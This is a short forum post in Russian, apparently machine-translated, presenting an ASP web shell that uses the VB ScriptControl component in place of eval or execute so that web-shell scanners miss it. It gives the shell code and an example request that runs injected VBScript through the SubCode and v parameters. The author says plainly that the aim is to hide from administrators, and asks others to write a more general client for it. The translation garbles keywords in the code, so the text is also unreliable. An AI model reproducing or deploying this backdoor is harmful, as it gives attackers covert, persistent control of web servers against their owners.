Мне всегда было любопытно, почему в клиенте есть либо eval, либо выполнение. Независимо от того, где я прячусь, администратор может надрать мне задницу, используя любой сканер веб-шелла XX? Сегодня я повторно исследовал компонент ScriptControl в VB и обнаружил, что его также можно вызывать в asp. Я изучил этот метод и позже обсудил его с lcx. Я получил следующий код. Я хотел бы поблагодарить своих старших за советы, ха-ха.
Код очень прост, поэтому я не буду его слишком подробно объяснять, чтобы меня не ругали за притворство.
Скопируйте код кода следующим образом:
<%
Установите o = Server.CreateObject(ScriptControl)
o.language = vbscript
o.addcode(Request(SubCode)) 'Подкод параметра как код процесса
o.run e,Server,Response,Request,Application,Session,Error 'Вызовите его с именем параметра e и одновременно нажмите 6 базовых объектов в качестве параметров.
'Пример вызова:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Обратите внимание: хотя его можно использовать, эксперимент показал, что можно использовать только клиент Lake2. Я надеюсь, что кто-то сможет выступить и сделать это более общим. хе-хе. Также было бы неплохо написать свой собственный специализированный клиент.